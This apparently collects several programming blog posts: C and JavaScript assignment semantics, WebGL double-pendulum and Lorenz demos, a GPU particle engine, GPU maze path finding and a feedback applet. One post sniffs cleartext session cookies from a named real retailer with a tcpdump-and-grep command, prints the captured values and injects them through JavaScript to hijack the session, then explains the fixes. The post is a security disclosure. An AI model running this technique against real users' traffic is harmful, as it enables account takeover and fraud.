Let rref be the result of evaluating AssignmentExpression.

Let rval be GetValue(rref).

Throw a SyntaxError exception if the following conditions are all true: [omitted]

Call PutValue(lref, rval).

Return rval.

Again, the result of the expression is independent of how it was stored with PutValue().

C specification

I’ll be referencing the original C89/C90 standard. The C specification requires a little more work to get to the bottom of the issue. Starting with 3.3.3.1 (Prefix increment and decrement operators):

The value of the operand of the prefix ++ operator is incremented. The result is the new value of the operand after incrementation. The expression ++E is equivalent to (E+=1).

Later in 3.3.16.2 (Compound assignment):

A compound assignment of the form E1 op = E2 differs from the simple assignment expression E1 = E1 op (E2) only in that the lvalue E1 is evaluated only once.

Then finally in 3.3.16 (Assignment operators):

An assignment operator stores a value in the object designated by the left operand. An assignment expression has the value of the left operand after the assignment, but is not an lvalue.

So the result is explicitly the value after assignment. Let’s look at this step by step after rewriting the expression.

int r = (array[0] = array[0] + 1);

In C, all integer operations are performed with at least int precision. Smaller integers are implicitly promoted to int before the operation. The value of array[0] is 255, and, since uint8_t is smaller than int, it gets promoted to int. Additionally, the literal constant 1 is also an int, so there are actually two reasons for this promotion.

So since these are int values, the result of the addition is 256, like in JavaScript. To store the result, this value is then demoted to uint8_t and truncated to 0. Finally, this post-assignment 0 is the result of the expression, not the right-hand result as in JavaScript.

Specifications are useful

These situations are why I prefer programming languages that have a formal and approachable specification. If there’s no specification and I’m observing undocumented, idiosyncratic behavior, is this just some subtle quirk of the current implementation — e.g. something that might change without notice in the future — or is it intended behavior that I can rely upon for correctness?

Two Chaotic Motion Demos

2018-02-15T04:18:07Z

I’ve put together two online, interactive, demonstrations of chaotic motion. One is 2D and the other is 3D, but both are rendered using WebGL — which, for me, is the most interesting part. Both are governed by ordinary differential equations. Both are integrated using the Runge–Kutta method, specifically RK4.

Far more knowledgeable people have already written introductions for chaos theory, so here’s just a quick summary. A chaotic system is deterministic but highly sensitive to initial conditions. Tweaking a single bit of the starting state of either of my demos will quickly lead to two arbitrarily different results. Both demonstrations have features that aim to show this in action.

This ain’t my first chaotic system rodeo. About eight years ago I made water wheel Java applet, and that was based on some Matlab code I collaborated on some eleven years ago. I really hope you’re not equipped to run a crusty old Java applet in 2018, though. (Update: now upgraded to HTML5 Canvas.)

If you want to find either of these demos again in the future, you don’t need to find this article first. They’re both listed in my Showcase page, linked from the header of this site.

Double pendulum

First up is the classic double pendulum. This one’s more intuitive than my other demo since it’s modeling a physical system you could actually build and observe in the real world.

Source: https://github.com/skeeto/double-pendulum

I lifted the differential equations straight from the Wikipedia article (derivative() in my code). Same for the Runge–Kutta method (rk4() in my code). It’s all pretty straightforward. RK4 may not have been the best choice for this system since it seems to bleed off energy over time. If you let my demo run over night, by morning there will obviously be a lot less activity.

I’m not a fan of buttons and other fancy GUI widgets — neither designing them nor using them myself — prefering more cryptic, but easy-to-use keyboard-driven interfaces. (Hey, it works well for mpv and MPlayer.) I haven’t bothered with a mobile interface, so sorry if you’re reading on your phone. You’ll just have to enjoy watching a single pendulum.

Here are the controls:

a: add a new random pendulum
c: imperfectly clone an existing pendulum
d: delete the most recently added pendulum
m: toggle between WebGL and Canvas rendering
SPACE: pause the simulation (toggle)

To witness chaos theory in action:

Start with a single pendulum (the default).
Pause the simulation (SPACE).
Make a dozen or so clones (press c for awhile).
Unpause.

At first it will appear as single pendulum, but they’re actually all stacked up, each starting from slightly randomized initial conditions. Within a minute you’ll witness the pendulums diverge, and after a minute they’ll all be completely different. It’s pretty to watch them come apart at first.

It might appear that the m key doesn’t actually do anything. That’s because the HTML5 Canvas rendering — which is what I actually implemented first — is really close to the WebGL rendering. I’m really proud of this. There are just three noticeable differences. First, there’s a rounded line cap in the Canvas rendering where the pendulum is “attached.” Second, the tail line segments aren’t properly connected in the Canvas rendering. The segments are stroked separately in order to get that gradient effect along its path. Third, it’s a lot slower, particularly when there are many pendulums to render.

In WebGL the two “masses” are rendered using that handy old circle rasterization technique on a quad. Either a triangle fan or pre-rendering the circle as a texture would probably have been a better choices. The two bars are the same quad buffers, just squeezed and rotated into place. Both were really simple to create. It’s the tail that was tricky to render.

When I wrote the original Canvas renderer, I set the super convenient lineWidth property to get a nice, thick tail. In my first cut at rendering the tail I used GL_LINE_STRIP to draw a line primitive. The problem with the line primitive is that an OpenGL implementation is only required to support single pixel wide lines. If I wanted wider, I’d have to generate the geometry myself. So I did.

Like before, I wasn’t about to dirty my hands manipulating a graphite-filled wooden stick on a piece of paper to solve this problem. No, I lifted the math from something I found on the internet again. In this case it was a forum post by paul.houx, which provides a few vector equations to compute a triangle strip from a line strip. My own modification was to add a miter limit, which keeps sharp turns under control. You can find my implementation in polyline() in my code. Here’s a close-up with the skeleton rendered on top in black:

For the first time I’m also using ECMAScript’s new template literals to store the shaders inside the JavaScript source. These string literals can contain newlines, but, even cooler, I it does string interpolation, meaning I can embed JavaScript variables directly into the shader code:

let massRadius = 0.12;
let vertexShader = `
attribute vec2 a_point;
uniform   vec2 u_center;
varying   vec2 v_point;

void main() {
    v_point = a_point;
    gl_Position = vec4(a_point * ${massRadius} + u_center, 0, 1);
}`;

Allocation avoidance

If you’ve looked at my code you might have noticed something curious. I’m using a lot of destructuring assignments, which is another relatively new addition to ECMAScript. This was part of a little experiment.

function normalize(v0, v1) {
    let d = Math.sqrt(v0 * v0 + v1 * v1);
    return [v0 / d, v1 / d];
}

/* ... */

let [nx, ny] = normalize(-ly, lx);

One of my goals for this project was zero heap allocations in the main WebGL rendering loop. There are no garbage collector hiccups if there’s no garbage to collect. This sort of thing is trivial in a language with manual memory management, such as C and C++. Just having value semantics for aggregates would be sufficient.

But with JavaScript I don’t get to choose how my objects are allocated. I either have to pre-allocate everything, including space for all the intermediate values (e.g. an object pool). This would be clunky and unconventional. Or I can structure and access my allocations in such a way that the JIT compiler can eliminate them (via escape analysis, scalar replacement, etc.).

In this case, I’m trusting that JavaScript implementations will flatten these destructuring assignments so that the intermediate array never actually exists. It’s like pretending the array has value semantics. This seems to work as I expect with V8, but not so well with SpiderMonkey (yet?), at least in Firefox 52 ESR.

Single precision

I briefly considered using Math.fround() to convince JavaScript to compute all the tail geometry in single precision. The double pendulum system would remain double precision, but the geometry doesn’t need all that precision. It’s all rounded to single precision going out to the GPU anyway.

Normally when pulling values from a Float32Array, they’re cast to double precision — JavaScript’s only numeric type — and all operations are performed in double precision, even if the result is stored back in a Float32Array. This is because the JIT compiler is required to correctly perform all the intermediate rounding. To relax this requirement, surround each operation with a call to Math.fround(). Since the result of doing each operation in double precision with this rounding step in between is equivalent to doing each operation in single precision, the JIT compiler can choose to do the latter.

let x = new Float32Array(n);
let y = new Float32Array(n);
let d = new Float32Array(n);
// ...
for (let i = 0; i < n; i++) {
    let xprod = Math.fround(x[i] * x[i]);
    let yprod = Math.fround(y[i] * y[i]);
    d[i] = Math.sqrt(Math.fround(xprod + yprod));
}

I ultimately decided not to bother with this since it would significantly obscures my code for what is probably a minuscule performance gain (in this case). It’s also really difficult to tell if I did it all correctly. So I figure this is better suited for compilers that target JavaScript rather than something to do by hand.

Lorenz system

The other demo is a Lorenz system with its famous butterfly pattern. I actually wrote this one a year and a half ago but never got around to writing about it. You can tell it’s older because I’m still using var.

Source: https://github.com/skeeto/lorenz-webgl

Like before, the equations came straight from the Wikipedia article (Lorenz.lorenz() in my code). They math is a lot simpler this time, too.

This one’s a bit more user friendly with a side menu displaying all your options. The keys are basically the same. This was completely by accident, I swear. Here are the important ones:

a: add a new random solution
c: clone a solution with a perturbation
C: remove all solutions
SPACE: toggle pause/unpause
You can click, drag, and toss it to examine it in 3D

Witnessing chaos theory in action is the same process as before: clear it down to a single solution (C then a), then add a bunch of randomized clones (c).

There is no Canvas renderer for this one. It’s pure WebGL. The tails are drawn using GL_LINE_STRIP, but in this case it works fine that they’re a single pixel wide. If heads are turned on, those are just GL_POINT. The geometry is threadbare for this one.

There is one notable feature: The tails are stored exclusively in GPU memory. Only the “head” is stored CPU-side. After it computes the next step, it updates a single spot of the tail with glBufferSubData(), and the VBO is actually a circular buffer. OpenGL doesn’t directly support rendering from circular buffers, but it does have element arrays. An element array is an additional buffer of indices that tells OpenGL what order to use the elements in the other buffers.

Naively would mean for a tail of 4 segments, I need 4 different element arrays, one for each possible rotation:

array 0: 0 1 2 3
array 1: 1 2 3 0
array 2: 2 3 0 1
array 3: 3 0 1 2

With the knowledge that element arrays can start at an offset, and with a little cleverness, you might notice these can all overlap in a single, 7-element array:

0 1 2 3 0 1 2

Array 0 is at offset 0, array 1 is at offset 1, array 2 is at offset 2, and array 3 is at offset 3. The tails in the Lorenz system are drawn using drawElements() with exactly this sort of array.

Like before, I was very careful to produce zero heap allocations in the main loop. The FPS counter generates some garbage in the DOM due to reflow, but this goes away if you hide the help menu (?). This was long enough ago that destructuring assignment wasn’t available, but Lorenz system and rendering it were so simple that using pre-allocated objects worked fine.

Beyond just the programming, I’ve gotten hours of entertainment playing with each of these systems. This was also the first time I’ve used WebGL in over a year, and this project was a reminder of just how working with it is so pleasurable. The specification is superbly written and serves perfectly as its own reference.

Stealing Session Cookies with Tcpdump

2016-06-23T21:55:24Z

My wife was shopping online for running shoes when she got this classic Firefox pop-up.

These days this is usually just a server misconfiguration annoyance. However, she was logged into an account, which included a virtual shopping cart and associated credit card payment options, meaning actual sensitive information would be at risk.

The main culprit was the website’s search feature, which wasn’t transmitted over HTTPS. There’s an HTTPS version of the search (which I found manually), but searches aren’t directed there. This means it’s also vulnerable to SSL stripping.

Fortunately Firefox warns about the issue and requires a positive response before continuing. Neither Chrome nor Internet Explorer get this right. Both transmit session cookies in the clear without warning, then subtly mention it after the fact. She may not have even noticed the problem (and then asked me about it) if not for that pop-up.

I contacted the website’s technical support two weeks ago and they never responded, nor did they fix any of their issues, so for now you can see this all for yourself.

Finding the session cookies

To prove to myself that this whole situation was really as bad as it looked, I decided to steal her session cookie and use it to manipulate her shopping cart. First I hit F12 in her browser to peek at the network headers. Perhaps nothing important was actually sent in the clear.

The session cookie (red box) was definitely sent in the request. I only need to catch it on the network. That’s an easy job for tcpdump.

tcpdump -A -l dst www.roadrunnersports.com and dst port 80 | \
    grep "^Cookie: "

This command tells tcpdump to dump selected packet content as ASCII (-A). It also sets output to line-buffered so that I can see packets as soon as they arrive (-l). The filter will only match packets going out to this website and only on port 80 (HTTP), so I won’t see any extraneous noise (dst and dst port ). Finally, I crudely run that all through grep to see if any cookies fall out.

On the next insecure page load I get this (wrapped here for display) spilling many times into my terminal:

Cookie: JSESSIONID=99004F61A4ED162641DC36046AC81EAB.prd_rrs12; visitSo
  urce=Registered; RoadRunnerTestCookie=true; mobify-path=; __cy_d=09A
  78CC1-AF18-40BC-8752-B2372492EDE5; _cybskt=; _cycurrln=; wpCart=0; _
  up=1.2.387590744.1465699388; __distillery=a859d68_771ff435-d359-489a
  -bf1a-1e3dba9b8c10-db57323d1-79769fcf5b1b-fc6c; DYN_USER_ID=16328657
  52; DYN_USER_CONFIRM=575360a28413d508246fae6befe0e1f4

That’s a bingo! I massage this into a bit of JavaScript, go to the store page in my own browser, and dump it in the developer console. I don’t know which cookies are important, but that doesn’t matter. I take them all.

document.cookie = "Cookie: JSESSIONID=99004F61A4ED162641DC36046A" +
                  "C81EAB.prd_rrs12;";
document.cookie = "visitSource=Registered";
document.cookie = "RoadRunnerTestCookie=true";
document.cookie = "mobify-path=";
document.cookie = "__cy_d=09A78CC1-AF18-40BC-8752-B2372492EDE5";
document.cookie = "_cybskt=";
document.cookie = "_cycurrln=";
document.cookie = "wpCart=0";
document.cookie = "_up=1.2.387590744.1465699388";
document.cookie = "__distillery=a859d68_771ff435-d359-489a-bf1a-" +
                  "1e3dba9b8c10-db57323d1-79769fcf5b1b-fc6c";
document.cookie = "DYN_USER_ID=1632865752";
document.cookie = "DYN_USER_CONFIRM=575360a28413d508246fae6befe0e1f4";

Refresh the page and now I’m logged in. I can see what’s in the shopping cart. I can add and remove items. I can checkout and complete the order. My browser is as genuine as hers.

How to fix it

The quick and dirty thing to do is set the Secure and HttpOnly flags on all cookies. The first prevents cookies from being sent in the clear, where a passive observer might see them. The second prevents the JavaScript from accessing them, since an active attacker could inject their own JavaScript in the page. Customers would appear to be logged out on plain HTTP pages, which is confusing.

However, since this is an online store, there’s absolutely no excuse to be serving anything over plain HTTP. This just opens customers up to downgrade attacks. The long term solution, in addition to the cookie flags above, is to redirect all HTTP requests to HTTPS and never serve or request content over HTTP, especially not executable content like JavaScript.

A GPU Approach to Particle Physics

2014-06-29T03:23:42Z

The next project in my GPGPU series is a particle physics engine that computes the entire physics simulation on the GPU. Particles are influenced by gravity and will bounce off scene geometry. This WebGL demo uses a shader feature not strictly required by the OpenGL ES 2.0 specification, so it may not work on some platforms, especially mobile devices. It will be discussed later in the article.

https://skeeto.github.io/webgl-particles/ (source)

It’s interactive. The mouse cursor is a circular obstacle that the particles bounce off of, and clicking will place a permanent obstacle in the simulation. You can paint and draw structures through which the the particles will flow.

Here’s an HTML5 video of the demo in action, which, out of necessity, is recorded at 60 frames-per-second and a high bitrate, so it’s pretty big. Video codecs don’t gracefully handle all these full-screen particles very well and lower framerates really don’t capture the effect properly. I also added some appropriate sound that you won’t hear in the actual demo.

On a modern GPU, it can simulate and draw over 4 million particles at 60 frames per second. Keep in mind that this is a JavaScript application, I haven’t really spent time optimizing the shaders, and it’s living within the constraints of WebGL rather than something more suitable for general computation, like OpenCL or at least desktop OpenGL.

Encoding Particle State as Color

Just as with the Game of Life and path finding projects, simulation state is stored in pairs of textures and the majority of the work is done by a fragment shader mapped between them pixel-to-pixel. I won’t repeat myself with the details of setting this up, so refer to the Game of Life article if you need to see how it works.

For this simulation, there are four of these textures instead of two: a pair of position textures and a pair of velocity textures. Why pairs of textures? There are 4 channels, so every one of these components (x, y, dx, dy) could be packed into its own color channel. This seems like the simplest solution.

The problem with this scheme is the lack of precision. With the R8G8B8A8 internal texture format, each channel is one byte. That’s 256 total possible values. The display area is 800 by 600 pixels, so not even every position on the display would be possible. Fortunately, two bytes, for a total of 65,536 values, is plenty for our purposes.

The next problem is how to encode values across these two channels. It needs to cover negative values (negative velocity) and it should try to take full advantage of dynamic range, i.e. try to spread usage across all of those 65,536 values.

To encode a value, multiply the value by a scalar to stretch it over the encoding’s dynamic range. The scalar is selected so that the required highest values (the dimensions of the display) are the highest values of the encoding.

Next, add half the dynamic range to the scaled value. This converts all negative values into positive values with 0 representing the lowest value. This representation is called Excess-K. The downside to this is that clearing the texture (glClearColor) with transparent black no longer sets the decoded values to 0.

Finally, treat each channel as a digit of a base-256 number. The OpenGL ES 2.0 shader language has no bitwise operators, so this is done with plain old division and modulus. I made an encoder and decoder in both JavaScript and GLSL. JavaScript needs it to write the initial values and, for debugging purposes, so that it can read back particle positions.

vec2 encode(float value) {
    value = value * scale + OFFSET;
    float x = mod(value, BASE);
    float y = floor(value / BASE);
    return vec2(x, y) / BASE;
}

float decode(vec2 channels) {
    return (dot(channels, vec2(BASE, BASE * BASE)) - OFFSET) / scale;
}

And JavaScript. Unlike normalized GLSL values above (0.0-1.0), this produces one-byte integers (0-255) for packing into typed arrays.

function encode(value, scale) {
    var b = Particles.BASE;
    value = value * scale + b * b / 2;
    var pair = [
        Math.floor((value % b) / b * 255),
        Math.floor(Math.floor(value / b) / b * 255)
    ];
    return pair;
}

function decode(pair, scale) {
    var b = Particles.BASE;
    return (((pair[0] / 255) * b +
             (pair[1] / 255) * b * b) - b * b / 2) / scale;
}

The fragment shader that updates each particle samples the position and velocity textures at that particle’s “index”, decodes their values, operates on them, then encodes them back into a color for writing to the output texture. Since I’m using WebGL, which lacks multiple rendering targets (despite having support for gl_FragData), the fragment shader can only output one color. Position is updated in one pass and velocity in another as two separate draws. The buffers are not swapped until after both passes are done, so the velocity shader (intentionally) doesn’t uses the updated position values.

There’s a limit to the maximum texture size, typically 8,192 or 4,096, so rather than lay the particles out in a one-dimensional texture, the texture is kept square. Particles are indexed by two-dimensional coordinates.

It’s pretty interesting to see the position or velocity textures drawn directly to the screen rather than the normal display. It’s another domain through which to view the simulation, and it even helped me identify some issues that were otherwise hard to see. The output is a shimmering array of color, but with definite patterns, revealing a lot about the entropy (or lack thereof) of the system. I’d share a video of it, but it would be even more impractical to encode than the normal display. Here are screenshots instead: position, then velocity. The alpha component is not captured here.

Entropy Conservation

One of the biggest challenges with running a simulation like this on a GPU is the lack of random values. There’s no rand() function in the shader language, so the whole thing is deterministic by default. All entropy comes from the initial texture state filled by the CPU. When particles clump up and match state, perhaps from flowing together over an obstacle, it can be difficult to work them back apart since the simulation handles them identically.

To mitigate this problem, the first rule is to conserve entropy whenever possible. When a particle falls out of the bottom of the display, it’s “reset” by moving it back to the top. If this is done by setting the particle’s Y value to 0, then information is destroyed. This must be avoided! Particles below the bottom edge of the display tend to have slightly different Y values, despite exiting during the same iteration. Instead of resetting to 0, a constant value is added: the height of the display. The Y values remain different, so these particles are more likely to follow different routes when bumping into obstacles.

The next technique I used is to supply a single fresh random value via a uniform for each iteration This value is added to the position and velocity of reset particles. The same value is used for all particles for that particular iteration, so this doesn’t help with overlapping particles, but it does help to break apart “streams”. These are clearly-visible lines of particles all following the same path. Each exits the bottom of the display on a different iteration, so the random value separates them slightly. Ultimately this stirs in a few bits of fresh entropy into the simulation on each iteration.

Alternatively, a texture containing random values could be supplied to the shader. The CPU would have to frequently fill and upload the texture, plus there’s the issue of choosing where to sample the texture, itself requiring a random value.

Finally, to deal with particles that have exactly overlapped, the particle’s unique two-dimensional index is scaled and added to the position and velocity when resetting, teasing them apart. The random value’s sign is multiplied by the index to avoid bias in any particular direction.

To see all this in action in the demo, make a big bowl to capture all the particles, getting them to flow into a single point. This removes all entropy from the system. Now clear the obstacles. They’ll all fall down in a single, tight clump. It will still be somewhat clumped when resetting at the top, but you’ll see them spraying apart a little bit (particle indexes being added). These will exit the bottom at slightly different times, so the random value plays its part to work them apart even more. After a few rounds, the particles should be pretty evenly spread again.

The last source of entropy is your mouse. When you move it through the scene you disturb particles and introduce some noise to the simulation.

Textures as Vertex Attribute Buffers

This project idea occurred to me while reading the OpenGL ES shader language specification (PDF). I’d been wanting to do a particle system, but I was stuck on the problem how to draw the particles. The texture data representing positions needs to somehow be fed back into the pipeline as vertices. Normally a buffer texture — a texture backed by an array buffer — or a pixel buffer object — asynchronous texture data copying — might be used for this, but WebGL has none these features. Pulling texture data off the GPU and putting it all back on as an array buffer on each frame is out of the question.

However, I came up with a cool technique that’s better than both those anyway. The shader function texture2D is used to sample a pixel in a texture. Normally this is used by the fragment shader as part of the process of computing a color for a pixel. But the shader language specification mentions that texture2D is available in vertex shaders, too. That’s when it hit me. The vertex shader itself can perform the conversion from texture to vertices.

It works by passing the previously-mentioned two-dimensional particle indexes as the vertex attributes, using them to look up particle positions from within the vertex shader. The shader would run in GL_POINTS mode, emitting point sprites. Here’s the abridged version,

attribute vec2 index;

uniform sampler2D positions;
uniform vec2 statesize;
uniform vec2 worldsize;
uniform float size;

// float decode(vec2) { ...

void main() {
    vec4 psample = texture2D(positions, index / statesize);
    vec2 p = vec2(decode(psample.rg), decode(psample.ba));
    gl_Position = vec4(p / worldsize * 2.0 - 1.0, 0, 1);
    gl_PointSize = size;
}

The real version also samples the velocity since it modulates the color (slow moving particles are lighter than fast moving particles).

However, there’s a catch: implementations are allowed to limit the number of vertex shader texture bindings to 0 (GL_MAX_VERTEX_TEXTURE_IMAGE_UNITS). So technically vertex shaders must always support texture2D, but they’re not required to support actually having textures. It’s sort of like food service on an airplane that doesn’t carry passengers. These platforms don’t support this technique. So far I’ve only had this problem on some mobile devices.

Outside of the lack of support by some platforms, this allows every part of the simulation to stay on the GPU and paves the way for a pure GPU particle system.

Obstacles

An important observation is that particles do not interact with each other. This is not an n-body simulation. They do, however, interact with the rest of the world: they bounce intuitively off those static circles. This environment is represented by another texture, one that’s not updated during normal iteration. I call this the obstacle texture.

The colors on the obstacle texture are surface normals. That is, each pixel has a direction to it, a flow directing particles in some direction. Empty space has a special normal value of (0, 0). This is not normalized (doesn’t have a length of 1), so it’s an out-of-band value that has no effect on particles.

(I didn’t realize until I was done how much this looks like the Greendale Community College flag.)

A particle checks for a collision simply by sampling the obstacle texture. If it finds a normal at its location, it changes its velocity using the shader function reflect. This function is normally used for reflecting light in a 3D scene, but it works equally well for slow-moving particles. The effect is that particles bounce off the the circle in a natural way.

Sometimes particles end up on/in an obstacle with a low or zero velocity. To dislodge these they’re given a little nudge in the direction of the normal, pushing them away from the obstacle. You’ll see this on slopes where slow particles jiggle their way down to freedom like jumping beans.

To make the obstacle texture user-friendly, the actual geometry is maintained on the CPU side of things in JavaScript. It keeps a list of these circles and, on updates, redraws the obstacle texture from this list. This happens, for example, every time you move your mouse on the screen, providing a moving obstacle. The texture provides shader-friendly access to the geometry. Two representations for two purposes.

When I started writing this part of the program, I envisioned that shapes other than circles could place placed, too. For example, solid rectangles: the normals would look something like this.

So far these are unimplemented.

Future Ideas

I didn’t try it yet, but I wonder if particles could interact with each other by also drawing themselves onto the obstacles texture. Two nearby particles would bounce off each other. Perhaps the entire liquid demo could run on the GPU like this. If I’m imagining it correctly, particles would gain volume and obstacles forming bowl shapes would fill up rather than concentrate particles into a single point.

I think there’s still some more to explore with this project.

A GPU Approach to Path Finding

2014-06-22T22:51:46Z

Last time I demonstrated how to run Conway’s Game of Life entirely on a graphics card. This concept can be generalized to any cellular automaton, including automata with more than two states. In this article I’m going to exploit this to solve the shortest path problem for two-dimensional grids entirely on a GPU. It will be just as fast as traditional searches on a CPU.

The JavaScript side of things is essentially the same as before — two textures with fragment shader in between that steps the automaton forward — so I won’t be repeating myself. The only parts that have changed are the cell state encoding (to express all automaton states) and the fragment shader (to code the new rules).

Online Demo (source)

Included is a pure JavaScript implementation of the cellular automaton (State.js) that I used for debugging and experimentation, but it doesn’t actually get used in the demo. A fragment shader (12state.frag) encodes the full automaton rules for the GPU.

Maze-solving Cellular Automaton

There’s a dead simple 2-state cellular automaton that can solve any perfect maze of arbitrary dimension. Each cell is either OPEN or a WALL, only 4-connected neighbors are considered, and there’s only one rule: if an OPEN cell has only one OPEN neighbor, it becomes a WALL.

On each step the dead ends collapse towards the solution. In the above GIF, in order to keep the start and finish from collapsing, I’ve added a third state (red) that holds them open. On a GPU, you’d have to do as many draws as the length of the longest dead end.

A perfect maze is a maze where there is exactly one solution. This technique doesn’t work for mazes with multiple solutions, loops, or open spaces. The extra solutions won’t collapse into one, let alone the shortest one.

To fix this we need a more advanced cellular automaton.

Path-solving Cellular Automaton

I came up with a 12-state cellular automaton that can not only solve mazes, but will specifically find the shortest path. Like above, it only considers 4-connected neighbors.

OPEN (white): passable space in the maze
WALL (black): impassable space in the maze
BEGIN (red): starting position
END (red): goal position
FLOW (green): flood fill that comes in four flavors: north, east, south, west
ROUTE (blue): shortest path solution, also comes in four flavors

If we wanted to consider 8-connected neighbors, everything would be the same, but it would require 20 states (n, ne, e, se, s, sw, w, nw) instead of 12. The rules are still pretty simple.

WALL and ROUTE cells never change state.
OPEN becomes FLOW if it has any adjacent FLOW cells. It points towards the neighboring FLOW cell (n, e, s, w).
END becomes ROUTE if adjacent to a FLOW cell. It points towards the FLOW cell (n, e, s, w). This rule is important for preventing multiple solutions from appearing.
FLOW becomes ROUTE if adjacent to a ROUTE cell that points towards it. Combined with the above rule, it means when a FLOW cell touches a ROUTE cell, there’s a cascade.
BEGIN becomes ROUTE when adjacent to a ROUTE cell. The direction is unimportant. This rule isn’t strictly necessary but will come in handy later.

This can be generalized for cellular grids of any arbitrary dimension, and it could even run on a GPU for higher dimensions, limited primarily by the number of texture uniform bindings (2D needs 1 texture binding, 3D needs 2 texture bindings, 4D needs 8 texture bindings … I think). But if you need to find the shortest path along a five-dimensional grid, I’d like to know why!

So what does it look like?

FLOW cells flood the entire maze. Branches of the maze are search in parallel as they’re discovered. As soon as an END cell is touched, a ROUTE is traced backwards along the flow to the BEGIN cell. It requires double the number of steps as the length of the shortest path.

Note that the FLOW cell keep flooding the maze even after the END was found. It’s a cellular automaton, so there’s no way to communicate to these other cells that the solution was discovered. However, when running on a GPU this wouldn’t matter anyway. There’s no bailing out early before all the fragment shaders have run.

What’s great about this is that we’re not limited to mazes whatsoever. Here’s a path through a few connected rooms with open space.

Maze Types

The worst-case solution is the longest possible shortest path. There’s only one frontier and running the entire automaton to push it forward by one cell is inefficient, even for a GPU.

The way a maze is generated plays a large role in how quickly the cellular automaton can solve it. A common maze generation algorithm is a random depth-first search (DFS). The entire maze starts out entirely walled in and the algorithm wanders around at random plowing down walls, but never breaking into open space. When it comes to a dead end, it unwinds looking for new walls to knock down. This methods tends towards long, winding paths with a low branching factor.

The mazes you see in the demo are Kruskal’s algorithm mazes. Walls are knocked out at random anywhere in the maze, without breaking the perfect maze rule. It has a much higher branching factor and makes for a much more interesting demo.

Skipping the Route Step

On my computers, with a 1023x1023 Kruskal maze ~~it’s about an order of magnitude slower~~ (see update below) than A* (rot.js’s version) for the same maze. ~~Not very impressive!~~ I believe this gap will close with time, as GPUs become parallel faster than CPUs get faster. However, there’s something important to consider: it’s not only solving the shortest path between source and goal, it’s finding the shortest path between the source and any other point. At its core it’s a breadth-first grid search.

Update: One day after writing this article I realized that glReadPixels was causing a gigantic bottlebeck. By only checking for the end conditions once every 500 iterations, this method is now equally fast as A* on modern graphics cards, despite taking up to an extra 499 iterations. In just a few more years, this technique should be faster than A*.

Really, there’s little use in ROUTE step. It’s a poor fit for the GPU. It has no use in any real application. I’m using it here mainly for demonstration purposes. If dropped, the cellular automaton would become 6 states: OPEN, WALL, and four flavors of FLOW. Seed the source point with a FLOW cell (arbitrary direction) and run the automaton until all of the OPEN cells are gone.

Detecting End State

The ROUTE cells do have a useful purpose, though. How do we know when we’re done? We can poll the BEGIN cell to check for when it becomes a ROUTE cell. Then we know we’ve found the solution. This doesn’t necessarily mean all of the FLOW cells have finished propagating, though, especially in the case of a DFS-maze.

In a CPU-based solution, I’d keep a counter and increment it every time an OPEN cell changes state. The the counter doesn’t change after an iteration, I’m done. OpenGL 4.2 introduces an atomic counter that could serve this role, but this isn’t available in OpenGL ES / WebGL. The only thing left to do is use glReadPixels to pull down the entire thing and check for end state on the CPU.

The original 2-state automaton above also suffers from this problem.

Encoding Cell State

Cells are stored per pixel in a GPU texture. I spent quite some time trying to brainstorm a clever way to encode the twelve cell states into a vec4 color. Perhaps there’s some way to exploit blending to update cell states, or make use of some other kind of built-in pixel math. I couldn’t think of anything better than a straight-forward encoding of 0 to 11 into a single color channel (red in my case).

int state(vec2 offset) {
    vec2 coord = (gl_FragCoord.xy + offset) / scale;
    vec4 color = texture2D(maze, coord);
    return int(color.r * 11.0 + 0.5);
}

This leaves three untouched channels for other useful information. I experimented (uncommitted) with writing distance in the green channel. When an OPEN cell becomes a FLOW cell, it adds 1 to its adjacent FLOW cell distance. I imagine this could be really useful in a real application: put your map on the GPU, run the cellular automaton a sufficient number of times, pull the map back off (glReadPixels), and for every point you know both the path and total distance to the source point.

Performance

As mentioned above, I ran the GPU maze-solver against A* to test its performance. I didn’t yet try running it against Dijkstra’s algorithm on a CPU over the entire grid (one source, many destinations). If I had to guess, I’d bet the GPU would come out on top for grids with a high branching factor (open spaces, etc.) so that its parallelism is most effectively exploited, but Dijkstra’s algorithm would win in all other cases.

Overall this is more of a proof of concept than a practical application. It’s proof that we can trick OpenGL into solving mazes for us!

Feedback Applet Ported to WebGL

2014-06-21T02:49:57Z

The biggest flaw with so many OpenGL tutorials is trying to teach two complicated topics at once: the OpenGL API and 3D graphics. These are only loosely related and do not need to be learned simultaneously. It’s far more valuable to focus on the fundamentals, which can only happen when handled separately. With the programmable pipeline, OpenGL is useful for a lot more than 3D graphics. There are many non-3D directions that tutorials can take.

I think that’s why I’ve been enjoying my journey through WebGL so much. Except for my sphere demo, which was only barely 3D, none of my projects have been what would typically be considered 3D graphics. Instead, each new project has introduced me to some new aspect of OpenGL, accidentally playing out like a great tutorial. I started out drawing points and lines, then took a dive into non-trivial fragment shaders, then textures and framebuffers, then the depth buffer, then general computation with fragment shaders.

The next project introduced me to alpha blending. I ported my old feedback applet to WebGL!

https://skeeto.github.io/Feedback/webgl/ (source)

Since finishing the port I’ve already spent a couple of hours just playing with it. It’s mesmerizing. Here’s a video demonstration in case WebGL doesn’t work for you yet. I’m manually driving it to show off the different things it can do.

Drawing a Frame

On my laptop, the original Java version plods along at about 6 frames per second. That’s because it does all of the compositing on the CPU. Each frame it has to blend over 1.2 million color components. This is exactly the sort of thing the GPU is built to do. The WebGL version does the full 60 frames per second (i.e. requestAnimationFrame) without breaking a sweat. The CPU only computes a couple of 3x3 affine transformation matrices per frame: virtually nothing.

Similar to my WebGL Game of Life, there’s texture stored on the GPU that holds almost all the system state. It’s the same size as the display. To draw the next frame, this texture is drawn to the display directly, then transformed (rotated and scaled down slightly), and drawn again to the display. This is the “feedback” part and it’s where blending kicks in. It’s the core component of the whole project.

Next, some fresh shapes are drawn to the display (i.e. the circle for the mouse cursor) and the entire thing is captured back onto the state texture with glCopyTexImage2D, to be used for the next frame. It’s important that glCopyTexImage2D is called before returning to the JavaScript top-level (back to the event loop), because the screen data will no longer be available at that point, even if it’s still visible on the screen.

Alpha Blending

They say a picture is worth a thousand words, and that’s literally true with the Visual glBlendFunc + glBlendEquation Tool. A few minutes playing with that tool tells you pretty much everything you need to know.

While you could potentially perform blending yourself in a fragment shader with multiple draw calls, it’s much better (and faster) to configure OpenGL to do it. There are two functions to set it up: glBlendFunc and glBlendEquation. There are also “separate” versions of all this for specifying color channels separately, but I don’t need that for this project.

